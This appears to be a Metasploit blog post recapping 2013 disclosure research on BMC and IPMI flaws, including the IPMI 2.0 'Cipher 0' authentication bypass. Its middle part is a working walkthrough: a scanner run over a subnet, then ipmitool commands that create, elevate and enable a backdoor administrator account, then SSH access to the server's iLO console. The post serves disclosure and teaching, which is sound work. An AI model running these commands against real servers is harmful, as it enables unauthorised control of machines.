12 Days of HaXmas: BMC and IPMI Research and Exploitation

Last updated at Wed, 07 Apr 2021 18:39:59 GMT

This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.

This year, infosec superstars Dan Farmer and HD Moore have been making an impressive effort to spread the warnings around the Baseboard Management Controllers (BMCs), used to provide remote management capabilities for servers and installed in nearly all servers manufactured today, and the Intelligent Platform Management Interface (IPMI), the server management protocol running on the BMC. Dan Farmer published a paper on IPMI and BMC security, disclosing several issues found while reviewing the security of the IPMI network protocol that uses UDP port 623. HD put together a set of methods and Metasploit modules available to exploit various of the issues with IPMI. The issues allow IPMI anonymous authentication due to default credentials, retrieve password hashes, and bypass authentication on IPMI 2.0 with the use of cipher type 0.

Let me remind you how to exploit the "Cipher 0" issue because it is nifty! You can just use the ipmi_cipher_zero module to identify systems that have cipher 0 enabled:

 msfconsole
 
       =[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1119 exploits - 638 auxiliary - 179 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
 
msf> use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_cipher_zero) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[+] 10.0.0.99:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.132:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.141:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.153:623 VULNERABLE: Accepted a session open request for cipher zero

And then use the standard ipmitool command-line interface and a valid username to create a backdoor account:

$ ipmitool -I lanplus -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
Error: Unable to establish IPMI v2 / RMCP+ session
Get User Access command failed (channel 14, user 1)
 
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   (Empty User)     true    false      false      NO ACCESS
 
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set name 2 hdm
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set password 2 password
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user priv 2 4
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user enable 2
 
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   hdm              true    false      true       ADMINISTRATOR
 
$ ssh hdm@10.0.0.99
hdm@10.0.0.99's password: password
 
User:hdm logged-in to ILOMXQ3469216(10.0.0.99)
iLO 4 Advanced Evaluation 1.13 at  Nov 08 2012
Server Name: host is unnamed
Server Power: On
 
</>hpiLO->

Simple and powerful! Remember, at the time of release Dan and HD found 53,000 IPMI 2.0 systems vulnerable to password bypass due to Cipher 0. If you haven't done so already, you might consider starting the year reviewing the FAQ about the BMC and IPMI research, Dan's paper, and HD Moore's penetration tester's guide!!

Not having enough with this research, later this same year HD Moore published the results of a security analysis on the Supermicro IPMI firmware, used in the baseboard management controller (BMC) of many Supermicro motherboards. In this analysis HD found usage of static encryption keys, hardcoded credentials, and several issues on the web management interface, including overflows, of course!

Exploiting memory corruption on these ARM-based embedded devices is really a challenging exercise which includes emulation, live exploitation, and keeping a lot of assembly in your head! If you would like to dig into the details, we published a journey into the exploiting too!

All in all, an impressive body of research which is worth to check carefully. In the meantime, I'm pretty sure these heavyweights will be working on more and awesome stuff... can't wait until see what 2014 offers the security community!